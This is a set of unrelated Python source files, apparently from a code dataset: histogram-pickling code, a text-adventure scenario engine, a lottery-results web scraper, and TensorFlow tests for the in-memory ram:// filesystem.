hv_count_check += big_hist_hv[key]
sv_count_check = 0
for key in big_hist_sv.keys():
sv_count_check += big_hist_sv[key]
hsv_count_check = 0
for key in big_hist_hsv.keys():
hsv_count_check += big_hist_hsv[key]
try:
if (
rgb_count_check != hsv_count_check
or rgb_count_check != big_total_pixels
or hsv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("Histogram counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rgb_count_check = {}".format(rgb_count_check))
logger.warning(" -> hsv_count_check = {}".format(hsv_count_check))
try:
if (
hs_count_check != big_total_pixels
or hv_count_check != big_total_pixels
or sv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("HSV 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> hv_count_check = {}".format(hv_count_check))
logger.warning(" -> hs_count_check = {}".format(hs_count_check))
logger.warning(" -> sv_count_check = {}".format(sv_count_check))
try:
if (
rb_count_check != big_total_pixels
or rg_count_check != big_total_pixels
or gb_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("RGB 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rg_count_check = {}".format(rg_count_check))
logger.warning(" -> rb_count_check = {}".format(rb_count_check))
logger.warning(" -> gb_count_check = {}".format(gb_count_check))
logger.info("Pickling non-normalized histogram dicts with 'size' key added.")
big_hist_rgb["size"] = big_total_pixels
big_hist_hsv["size"] = big_total_pixels
big_hist_rg["size"] = big_total_pixels
big_hist_rb["size"] = big_total_pixels
big_hist_gb["size"] = big_total_pixels
big_hist_hs["size"] = big_total_pixels
big_hist_hv["size"] = big_total_pixels
big_hist_sv["size"] = big_total_pixels
rgb_hist_location = os.path.join(hist_output_dir, "hist_rgb.pickle")
hsv_hist_location = os.path.join(hist_output_dir, "hist_hsv.pickle")
rg_hist_location = os.path.join(hist_output_dir, "hist_rg.pickle")
rb_hist_location = os.path.join(hist_output_dir, "hist_rb.pickle")
gb_hist_location = os.path.join(hist_output_dir, "hist_gb.pickle")
hs_hist_location = os.path.join(hist_output_dir, "hist_hs.pickle")
hv_hist_location = os.path.join(hist_output_dir, "hist_hv.pickle")
sv_hist_location = os.path.join(hist_output_dir, "hist_sv.pickle")
with open(rgb_hist_location, "wb") as fp:
pickle.dump(big_hist_rgb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rgb pickled to {}".format(fp))
with open(hsv_hist_location, "wb") as fp:
pickle.dump(big_hist_hsv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hsv pickled to {}".format(fp))
with open(rg_hist_location, "wb") as fp:
pickle.dump(big_hist_rg, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rg pickled to {}".format(fp))
with open(rb_hist_location, "wb") as fp:
pickle.dump(big_hist_rb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rb pickled to {}".format(fp))
with open(gb_hist_location, "wb") as fp:
pickle.dump(big_hist_gb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_gb pickled to {}".format(fp))
with open(hs_hist_location, "wb") as fp:
pickle.dump(big_hist_hs, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hs pickled to {}".format(fp))
with open(hv_hist_location, "wb") as fp:
pickle.dump(big_hist_hv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hv pickled to {}".format(fp))
with open(sv_hist_location, "wb") as fp:
pickle.dump(big_hist_sv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_sv pickled to {}".format(fp))
logger.info("Histogram data for RGB and HSV has been pickled.")
logger.warning("Removing 'size' key from histograms.")
del big_hist_rgb["size"]
del big_hist_hsv["size"]
del big_hist_rg["size"]
del big_hist_rb["size"]
del big_hist_gb["size"]
del big_hist_hs["size"]
del big_hist_hv["size"]
del big_hist_sv["size"] | 0.391057 | 0.209025 |
import json
import logging
import uuid
from typing import Dict, Type, TypeVar
from dataclasses import replace
from server.engine.action_result import ActionResult
from server.engine.ending import Ending
from server.engine.location import Location
from server.engine.object import AdventureObject, Activateable
# Generic variable that can be 'Scenario' or any subclass.
T = TypeVar('T', bound='Scenario')
class Scenario():
"""A text adventure scenario."""
def __init__(self, title: str, greeting: str, starting_location_id: str,
**kwargs):
self.title: str = title
self.greeting: str = greeting
self.starting_location_id: str = starting_location_id
self.UNKNOWN_ACTION_RESPONSE: str = kwargs.get(
'UNKNOWN_ACTION_RESPONSE', 'You aren\'t so sure about that.')
self.game_id: str = kwargs.get('game_id', uuid.uuid4().__str__())
self.all_locations: Dict[str, Location] = {}
self.all_objects: Dict[str, AdventureObject] = {}
self.all_endings: list[Ending] = []
self.player_inventory: Dict[str, AdventureObject] = {}
self.player_location = None
self.ended = False
def __repr__(self):
return f'{self.title}, locs: {self.all_locations} objs: {self.all_objects}, endings: {self.all_endings}'
def add_location(self, loc: Location) -> None:
"""Register a location in the scenario.
Args:
loc: The location to register.
NOTE: The location must have a unique id inside of the scenario.
"""
if self.all_locations.get(loc.id) is not None:
raise RuntimeError('location already exists in scenario')
else:
self.all_locations[loc.id] = loc
def add_object(self, obj: AdventureObject) -> None:
"""Register a location in the scenario.
Args:
loc: The location to register.
NOTE: The location must have a unique id inside of the scenario.
"""
if self.all_objects.get(obj.id) is not None:
raise RuntimeError('location already exists in scenario')
else:
self.all_objects[obj.id] = obj
def add_ending(self, ending: Ending):
self.all_endings.append(ending)
def begin(self) -> None:
"""Begins the scenario.
The initialization logic once a Scenario is fully assembled and the
AdventureEngine is ready to send the first message to the player.
"""
logging.debug('SCENARIO CONFIGURATION:')
logging.debug(
'all_locations: %s',
[location.id for location in self.all_locations.values()])
logging.debug('all_objects: %s',
[obj.id for obj in self.all_objects.values()])
if not self.all_locations.get(self.starting_location_id):
            raise RuntimeError('starting location not found in all_locations')
self.player_location = self.all_locations[self.starting_location_id]
def move(self, direction: str, **kwargs) -> ActionResult:
"""Move action handler for the scenario.
NOTE: This is the only handler that is called on a MOVE action.
"""
if direction in self.player_location.exits:
target_loc = self.all_locations[
self.player_location.exits[direction]]
# Check to see if the location requires any items.
if target_loc.requires:
for item_id in target_loc.requires:
if item_id not in self.player_inventory:
return ActionResult(
action_text=target_loc.travel_failure)
self.player_location = target_loc
# After moving, remove any required items.
for item_id in target_loc.requires:
self.player_inventory.pop(item_id)
target_loc.remove_requirement(item_id)
# Check to see if the move ends the game.
for ending in self.all_endings:
if ending.fulfilled(self.player_inventory,
self.player_location.id):
self.ended = True
return ActionResult(adventure_text=ending.message,
action_text="")
action_text = target_loc.travel_action or f'You travel {direction}.'
# Use replace because look also returns a ActionResult.
# (And we want the action_text to be either the generic travel text
# or the location custom travel_action.)
return replace(self.player_location.look(**kwargs),
action_text=action_text,
push_inventory_update=True)
else:
return ActionResult(action_text='You cannot go that way.')
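    # Example flow (illustrative): if the current location has exits
    # {"north": "cave"} and the "cave" location requires "torch", move("north")
    # returns the travel_failure text until "torch" is in player_inventory; on a
    # successful move the torch is consumed and the requirement is cleared.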
def serialize(self) -> str:
"""Transform the current scenario into a data string for storage."""
data = {}
data['game_id'] = self.game_id
data['title'] = self.title
data['greeting'] = self.greeting
data['starting_location_id'] = self.starting_location_id
data['UNKNOWN_ACTION_RESPONSE'] = self.UNKNOWN_ACTION_RESPONSE
data['all_locations'] = [
location.serialize() for location in self.all_locations.values()
]
data['all_objects'] = [
obj.serialize() for obj in self.all_objects.values()
]
data['player_location'] = self.player_location.serialize(
) if self.player_location else ''
data['player_inventory'] = [
obj.serialize() for obj in self.player_inventory.values()
]
data['all_endings'] = [
ending.serialize() for ending in self.all_endings
]
logging.debug(f'serialize scenario: {self}')
return json.dumps(data)
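    # Illustrative round trip (variable names are assumptions for the example):
    #     blob = scenario.serialize()            # JSON string, safe to persist
    #     restored = Scenario.deserialize(blob)  # rebuilt with the same game_id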
@classmethod
def deserialize(cls: Type[T], data: str) -> T:
"""Transform a data string into a loaded scenario."""
loaded = json.loads(data)
scenario = cls(**loaded)
for obj in loaded['all_objects']:
loaded_obj = AdventureObject.deserialize(obj)
scenario.all_objects[loaded_obj.id] = loaded_obj
for loc in loaded['all_locations']:
loaded_loc = Location.deserialize(loc)
scenario.all_locations[loaded_loc.id] = loaded_loc
player_location = Location.deserialize(loaded['player_location'])
if player_location.id not in scenario.all_locations.keys():
raise RuntimeError(
'Player location could not be found in loaded data!')
scenario.player_location = scenario.all_locations[player_location.id]
for obj in loaded['player_inventory']:
loaded_obj = AdventureObject.deserialize(obj)
scenario.player_inventory[loaded_obj.id] = loaded_obj
for ending in loaded['all_endings']:
scenario.add_ending(Ending.deserialize(ending))
logging.debug(f'deserialize scenario: {scenario}')
        return scenario | server/engine/scenario.py | 0.78037 | 0.179135
from bs4 import BeautifulSoup
from Spiders.spiders.lottery.lottery_model import LotteryCNSSQ
from Spiders.common import config, database, utils, utils_html
def get_page_num(url, headers):
"""获取url总页数"""
soup = BeautifulSoup(utils_html.getPage(url, headers).content, 'lxml')
pagenums = soup.select('body > table > tr > td > p.pg > strong:nth-of-type(1)')
if len(pagenums) > 0:
return int(pagenums[0].get_text().replace(',', ''))
else:
return 0
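# Illustrative call (helper names come from this project's utils_html module):
#     total_pages = get_page_num(utils_html.getSSQURL(1), utils_html.getHeaders())
#     # total_pages == 0 means the pagination element was not found on the page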
def ins_data_ssq():
"""爬取双色球开奖信息并插入数据库"""
# 获取上次爬取的最大ID
conn = database.CommonDBExecutor(config.get_database_url(), LotteryCNSSQ)
results = conn.querybysqlstr(r'''select max(id_) max_id from data_analysis.lottery_cn_ssq''')
end_id = utils.obj2int(results[0]['max_id'])
    for list_num in range(1, get_page_num(utils_html.getSSQURL(1), utils_html.getHeaders())): # from page 1 to page getPageNum(url)
url = utils_html.getSSQURL(list_num)
soup = BeautifulSoup(utils_html.getPage(url, utils_html.getHeaders()).content, 'lxml')
list_date_ = soup.select('body > table > tr > td:nth-of-type(1)')
list_id_ = soup.select('body > table > tr > td:nth-of-type(2)')
list_win_nums = soup.select('body > table > tr > td:nth-of-type(3)')
list_amount_ = soup.select('body > table > tr > td:nth-of-type(4) > strong')
list_prize_first = soup.select('body > table > tr > td:nth-of-type(5) > strong')
list_prize_second = soup.select('body > table > tr > td:nth-of-type(6) > strong')
ssqdatas = []
for date_, id_, win_nums, amount_, prize_first, prize_second in zip(list_date_, list_id_, list_win_nums,
list_amount_, list_prize_first,
list_prize_second):
if int(id_.get_text().replace(',', '')) <= int(end_id): break
data = {
'id_': utils.obj2int(id_.get_text().replace(',', '')),
'date_': date_.get_text(),
'win_nums_red': ','.join(list(win_nums.stripped_strings)[:-1]),
'win_nums_blue': list(win_nums.stripped_strings)[-1],
'amount_': utils.obj2int(amount_.get_text().replace(',', '').strip()),
'prize_first': utils.obj2int(prize_first.get_text().replace(',', '').strip()),
'prize_second': utils.obj2int(prize_second.get_text().replace(',', '').strip())
}
ssqdatas.append(data)
        if len(ssqdatas) == 0:
            print("[SSQ] No qualifying data was scraped!")
            break
        else:
            print("[SSQ] Scraped %s qualifying records this time!" % (len(ssqdatas)))
            # Insert into the database
            conn.insert_by_batch(ssqdatas) | Learn_pkgs/learn/BeautifulSoup/spider_ssq.py | 0.246715 | 0.120724
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import def_function
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.model_fn import EstimatorSpec
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.module import module
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training import adam
from tensorflow.python.training import training_util
class RamFilesystemTest(test_util.TensorFlowTestCase):
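  """Tests for the in-memory ram:// filesystem accessed through gfile."""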
def test_write_file(self):
with gfile.GFile('ram://a.txt', 'w') as f:
f.write('Hello, world.')
f.write('Hello, world.')
with gfile.GFile('ram://a.txt', 'r') as f:
self.assertEqual(f.read(), 'Hello, world.' * 2)
def test_append_file_with_seek(self):
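    # Re-open with 'w+', seek to the end (whence=2), and write again; the test expects the second write to append.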
with gfile.GFile('ram://c.txt', 'w') as f:
f.write('Hello, world.')
with gfile.GFile('ram://c.txt', 'w+') as f:
f.seek(offset=0, whence=2)
f.write('Hello, world.')
with gfile.GFile('ram://c.txt', 'r') as f:
self.assertEqual(f.read(), 'Hello, world.' * 2)
def test_list_dir(self):
for i in range(10):
with gfile.GFile('ram://a/b/%d.txt' % i, 'w') as f:
f.write('')
with gfile.GFile('ram://c/b/%d.txt' % i, 'w') as f:
f.write('')
matches = ['ram://a/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.ListDirectory('ram://a/b/'), matches)
def test_glob(self):
for i in range(10):
with gfile.GFile('ram://a/b/%d.txt' % i, 'w') as f:
f.write('')
with gfile.GFile('ram://c/b/%d.txt' % i, 'w') as f:
f.write('')
matches = ['ram://a/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.Glob('ram://a/b/*'), matches)
matches = []
self.assertEqual(gfile.Glob('ram://b/b/*'), matches)
matches = ['ram://c/b/%d.txt' % i for i in range(10)]
self.assertEqual(gfile.Glob('ram://c/b/*'), matches)
def test_file_exists(self):
with gfile.GFile('ram://exists/a/b/c.txt', 'w') as f:
f.write('')
self.assertTrue(gfile.Exists('ram://exists/a'))
self.assertTrue(gfile.Exists('ram://exists/a/b'))
self.assertTrue(gfile.Exists('ram://exists/a/b/c.txt'))
self.assertFalse(gfile.Exists('ram://exists/b'))
self.assertFalse(gfile.Exists('ram://exists/a/c'))
self.assertFalse(gfile.Exists('ram://exists/a/b/k'))
def test_estimator(self):
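    # Train a small Estimator whose model_dir lives on the RAM filesystem, so
    # checkpoints and graph metadata are written to and restored from ram:// paths.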
def model_fn(features, labels, mode, params):
del params
x = core_layers.dense(features, 100)
x = core_layers.dense(x, 100)
x = core_layers.dense(x, 100)
x = core_layers.dense(x, 100)
y = core_layers.dense(x, 1)
loss = losses.mean_squared_error(labels, y)
opt = adam.AdamOptimizer(learning_rate=0.1)
train_op = opt.minimize(
loss, global_step=training_util.get_or_create_global_step())
return EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
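    # Random regression batch; only the shapes matter for exercising checkpoint writes.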
def input_fn():
batch_size = 128
return (constant_op.constant(np.random.randn(batch_size, 100),
dtype=dtypes.float32),
constant_op.constant(np.random.randn(batch_size, 1),
dtype=dtypes.float32))
config = RunConfig(
model_dir='ram://estimator-0/', save_checkpoints_steps=1)
estimator = Estimator(config=config, model_fn=model_fn)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
estimator.train(input_fn=input_fn, steps=10)
def test_savedmodel(self):
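    # Round-trip a tf.Module SavedModel through the RAM filesystem and call the restored function.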
class MyModule(module.Module):
@def_function.function(input_signature=[])
def foo(self):
return constant_op.constant([1])
saved_model.save(MyModule(), 'ram://my_module')
loaded = saved_model.load('ram://my_module')
self.assertAllEqual(loaded.foo(), [1])
if __name__ == '__main__':
  test.main() | tensorflow/core/platform/ram_file_system_test.py | 0.759047 | 0.32021
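# A short, hedged sketch of the ram:// scheme exercised by
# ram_file_system_test.py above, written against the public tf.io.gfile API
# rather than the internal gfile module. It assumes a TensorFlow build in
# which the RAM filesystem is registered (exactly what the test verifies);
# the paths and file contents are illustrative.
import tensorflow as tf
def ram_fs_demo():
    # Write a small text file into the in-memory filesystem.
    with tf.io.gfile.GFile('ram://demo/notes.txt', 'w') as f:
        f.write('scratch data that never touches disk')
    # Read it back.
    with tf.io.gfile.GFile('ram://demo/notes.txt', 'r') as f:
        print(f.read())
    # Directory-style queries behave the same as for on-disk paths.
    print(tf.io.gfile.exists('ram://demo/notes.txt'))  # expected: True
    print(tf.io.gfile.glob('ram://demo/*'))            # expected: ['ram://demo/notes.txt']
if __name__ == '__main__':
    ram_fs_demo()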